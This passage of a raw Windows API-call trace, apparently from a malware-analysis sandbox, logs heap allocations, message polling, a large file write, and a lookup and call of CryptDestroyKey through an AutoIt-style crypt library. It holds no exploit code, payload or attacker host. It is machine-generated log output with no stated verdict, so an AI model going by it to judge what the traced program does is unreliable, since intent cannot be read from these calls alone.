[0264.578] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0264.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0264.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0264.578] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0264.578] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0264.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0264.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0264.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0264.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0264.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0264.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0264.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf8b0) returned 0x2f16018 [0264.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0264.580] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f16018*, nNumberOfBytesToWrite=0xf8b0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f16018*, lpNumberOfBytesWritten=0x8cf5e4*=0xf8b0, lpOverlapped=0x0) returned 1 [0264.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0264.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0264.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0264.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0264.583] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0264.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0264.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0264.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0264.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0264.583] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0264.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0264.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0264.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0264.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51868 [0264.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0264.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0264.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51730 [0264.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0264.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51688 [0264.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0264.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0264.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51808 [0264.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0264.584] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0264.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0264.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550d8 [0264.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0264.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0264.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0264.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51910 [0264.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0264.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0264.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0264.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0264.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0264.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0264.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0264.584] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0264.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0264.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0264.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0264.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0264.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0264.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0264.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0264.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0264.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0264.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0264.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0264.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0264.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0264.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0264.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0264.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0264.585] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0264.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51958 [0264.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0264.585] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0264.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0264.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0264.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0264.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0264.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0264.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0264.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0264.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0264.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0264.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0264.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0264.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0264.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0264.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0264.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0264.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0264.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0264.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0264.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0264.586] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0264.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0264.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0264.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0264.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0264.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0264.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0264.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0264.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0264.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0264.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0264.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0264.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0264.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0264.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0264.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0264.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0264.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0264.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51ac0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0264.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0264.587] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0264.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0264.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0264.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0264.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0264.588] CryptDestroyKey (hKey=0xa875d0) returned 1 [0264.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0264.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0264.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0264.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0264.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0264.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0264.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0264.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0264.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0264.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0264.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0264.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0264.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0264.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0264.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0264.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0264.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0264.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0264.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0264.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0264.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0264.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0264.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0264.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0264.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0264.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0264.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0264.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0264.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15a18 [0264.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0264.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14488 | out: hHeap=0x970000) returned 1 [0264.589] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0264.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0264.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0264.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0264.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0264.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0264.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0264.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0264.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0264.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0264.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0264.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0264.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0264.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0264.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0264.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.590] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0264.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0264.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0264.590] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0264.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0264.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518c8 [0264.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0264.590] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0264.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0264.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0264.590] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0264.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0264.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0264.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0264.591] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0264.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0264.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0264.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0264.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0264.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0264.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0264.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b20 [0264.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0264.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0264.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51958 [0264.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0264.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0264.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0264.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0264.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51970 [0264.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.592] 